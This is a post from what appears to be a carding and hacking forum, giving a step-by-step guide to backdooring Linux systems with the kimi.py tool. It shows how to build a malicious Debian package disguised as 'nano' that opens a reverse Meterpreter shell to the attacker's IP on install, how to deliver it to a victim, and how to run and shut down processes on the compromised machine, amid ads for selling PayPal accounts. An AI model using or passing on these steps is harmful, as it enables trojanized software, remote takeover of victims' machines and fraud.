Darkpro : Carding Forums - Carders Forums - Best Carding Forums - Hacking Forum - ANDROID

This is a sample guest message. Register a free account today to become a member! Once signed in, you'll be able to participate on this site by adding your own topics and posts, as well as connect with other members through your own private inbox!

Darkpro Support and Advertisement ICQ-50403007 Telegran-@DARKATN [email protected]



Mr-X

Verified Seller Topic Selling Paypal, Payoneer,Ban
Verified Seller
Staff Member
Premium User
Why would someone want to Target a system running on Linux ?


7-linux_traffic_light_7_thumb800.jpg





Over 60% of all web servers around the world are running variations of the Linux and a lot of personal Computers & Smart Phones. Lets just say Linux is everywhere from Traffic Lights to thermostats. Linux is now finding its way onto televisions, and even cars. As software creeps into practically every aspect of our lives, so does the OS designed by Linus Torvalds.

An attacker would target a Web Server or Personal System to gain remote access and gain a Shell this would allow an attacker to edit modify delete and execute processes from the target system as well as carry out further attacks.

Requirements:

Kali Linux (Attacker)
Computer running Linux Operating Sysem
kimi.py
Metasploit Framework

What is kimi?

Kimi is a script which generates Malicious debian package for metasploit
which consists of bash file. the bash file is deployed into “/usr/local/bin/” directory.
Backdoor gets executed just when victim tries to install deb package due to postinst file
Bash file injects and also acts like some system command which when executed by victim
and attacker hits with session.
Download Kimi

Lets start open up a new terminal and run kimi.py Python script.

Code:



python kimi.py


Screenshot-from-2017-04-09-20-42-17.png





Screenshot-from-2017-04-09-20-42-31.png





Now we know that our script is working its now time to set reverse ip address and choose a version for our malicious Debian package.
To find your local ip address use command ifconfig from your terminal.

Code:



ifconfig


Screenshot-from-2017-04-09-20-45-14.png





Now we know what our local Ip Address is we can use this to configure our malicious payload.
In a terminal run kimi.py with these options replacing the IP Address with your own local ip address.

sudo python kimi.py -n nano -l 192.168.43.49 -V 1.0

What this command does is runs kimi and tells the script to build a malicious .DEB package of nano version 1.0.


Screenshot-from-2017-04-09-20-46-58.png





Screenshot-from-2017-04-09-20-48-01.png





After the script has finished creating the malicious .DEB file it will then spawn Metasploit Framework in XTerm.


Screenshot-from-2017-04-09-20-47-39.png





Now move the malicious payload across to the victim machine. I will be using a USB thumb drive and the Operating system I’ll be targeting is (Linux Kubuntu 64bit). however you can use what ever Linux Operating System you like considering it accepts building Debain Packages. Use what ever method suits your situation best for delivery of the payload.

Use dpkg -i to install the malicious package from the victim machine however you can double click the package to install it if you like.
Like many users I will follow trend and install my .DEB package with sudo rights.

Code:



sudo dpkg -i <deb-package>

Tip: (remember in Linux sudo can be your best friend or your worst enemy.) By the end of this guide you should understand why.


Screenshot_20170409_195534.png





Screenshot-from-2017-04-09-20-52-35.png





You can see from the screen shot below we have now established a reverse meterpreter connection with the target machine.


Screenshot-from-2017-04-09-20-55-03.png





We can now list and connect to an established metapreter session.

To list sessions: session -i

Connection to a session: session -i 1

Now that we have established a metapreter shell we use use the help command to list available options on the target machine.


Screenshot-from-2017-04-09-20-56-32.png





We will now execute a command and start a program on our target machine to achieve this we can use execute command with option -f.

Example: meterpreter > execute -f gimp


Screenshot-from-2017-04-09-20-57-38.png





This command will execute a process id for gimp and run the software on the target machine.


Screenshot_20170409_195829.png





Lets say for what ever reason we needed a detailed list of connections on the target network we could use ifconfig to list various information about the target network including Mac Address and Interface names and set various network modes.


Screenshot-from-2017-04-09-20-57-17.png





We will now get the uid of the established session. This will help us tell if we are running the shell under a root or standard user.


Screenshot-from-2017-04-09-21-10-19.png





Lets shutdown the target system by executing a shutdown command we can achieve this by using the command execute followed by shutdown.
Any command that the Linux system allows can be executed by meterpreter including starting and restarting running services.
 
Please Bookmark our mirror domains : Darkpro.cc
Back
Top